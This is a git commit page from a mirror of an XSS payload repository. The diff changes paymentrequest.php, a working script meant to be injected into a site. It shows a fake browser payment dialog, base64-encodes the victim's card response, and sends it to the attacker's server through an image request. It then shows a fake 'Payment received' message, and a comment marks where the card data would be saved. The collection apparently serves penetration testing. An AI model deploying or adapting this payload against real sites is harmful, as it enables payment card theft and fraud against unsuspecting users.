Mirrors/xss_payloads
2
0
Fork 0
mirror of https://github.com/nettitude/xss_payloads.git synced 2024-11-10 06:34:14 +00:00
Code Issues Projects Releases Packages Wiki Activity

Made confirmation message work on image load

Browse source
This commit is contained in:
strawp 2017-10-27 15:30:18 +01:00
parent 329e5f48c1
commit b2ab0d0f54
1 changed files with 69 additions and 50 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

115
paymentrequest.php
View file

@ -7,39 +7,45 @@
* - value - cash value of purchase (default: "10") * - value - cash value of purchase (default: "10")
* - confirmation - URL of the payment confirmation page to forward to after receiving details * - confirmation - URL of the payment confirmation page to forward to after receiving details
*/ */
header( "Content-type: text/javascript" );
$url = 'http';
if( !empty( $_SERVER['HTTPS'] ) ){
$url .= 's';
}
$url .= "://";
if( empty( $_SERVER['HTTP_HOST'] ) ){
$url .= $_SERVER["SERVER_ADDR"];
}else{
$url .= $_SERVER['HTTP_HOST'];
}
$url .= $_SERVER["PHP_SELF"];
if( !empty( $_GET["label"] ) ){
$label = $_GET["label"];
}else{
$label = "Total";
}
if( !empty( $_GET["currency"] ) ){
$currency = $_GET["currency"];
}else{
$currency = "GBP";
}
if( !empty( $_GET["value"] ) ){
$value = $_GET["value"];
}else{
$value = "10";
}
if(empty($_GET["data"])){ if(empty($_GET["data"])){
header( "Content-type: text/javascript" );
$url = 'http';
if( !empty( $_SERVER['HTTPS'] ) ){
$url .= 's';
}
$url .= "://";
if( empty( $_SERVER['HTTP_HOST'] ) ){
$url .= $_SERVER["SERVER_ADDR"];
}else{
$url .= $_SERVER['HTTP_HOST'];
}
$url .= $_SERVER["PHP_SELF"];
if( !empty( $_GET["label"] ) ){
$label = $_GET["label"];
}else{
$label = "Total";
}
if( !empty( $_GET["currency"] ) ){
$currency = $_GET["currency"];
}else{
$currency = "GBP";
}
if( !empty( $_GET["value"] ) ){
$value = $_GET["value"];
}else{
$value = "10";
}
if( !empty( $_GET["confirmation"] ) ){
$confirmation = $_GET["confirmation"];
}else{
$confirmation = null;
}
?> ?>
if(window.PaymentRequest) { if(window.PaymentRequest) {
@ -64,27 +70,40 @@ if(window.PaymentRequest) {
const request = new PaymentRequest( supportedPaymentMethods, paymentDetails, options ); const request = new PaymentRequest( supportedPaymentMethods, paymentDetails, options );
request.show() promise = request.show()
.then((paymentResponse) => { .then((paymentResponse) => {
return paymentResponse.complete()
.then(() => {;
// Send payment response back to this URL
url = '<?=$url?>?data=' + btoa(JSON.stringify(paymentResponse));
i= new Image();
i.addEventListener('load', function(){
<?php if($confirmation){ ?>
window.location = '<?=$confirmation?>';
<?php }else{ ?>
alert("Payment received, thank you")
<?php } ?>
},false);
i.src = url;
});
// Send payment response back to this URL }).catch((err) => {
console.log(paymentResponse); console.log("Payment request failed");
url = '<?=$url?>?data=' + btoa(JSON.stringify(paymentResponse)); });
console.log(url);
new Image().src = url;
return paymentResponse.complete();
}).catch((err) => {
console.log("Payment request failed");
});
<?php
if( !empty($_GET["confirmation"]) ){
?>
window.location = "<?=$_GET["confirmation"]?>";
<?php } ?>
} else { } else {
// Fallback to traditional checkout // Fallback to traditional checkout
console.log("PaymentRequest API not supported in this browser"); console.log("PaymentRequest API not supported in this browser");
} }
<?php <?php
}else{
// Output a blank gif
header( "Content-type: image/gif" );
header( "Cache-control: no-cache, no-store, max-age=0, private" );
header( "Pragma: no-cache" );
echo base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7");
// Save CC data here if required
} }
?> ?>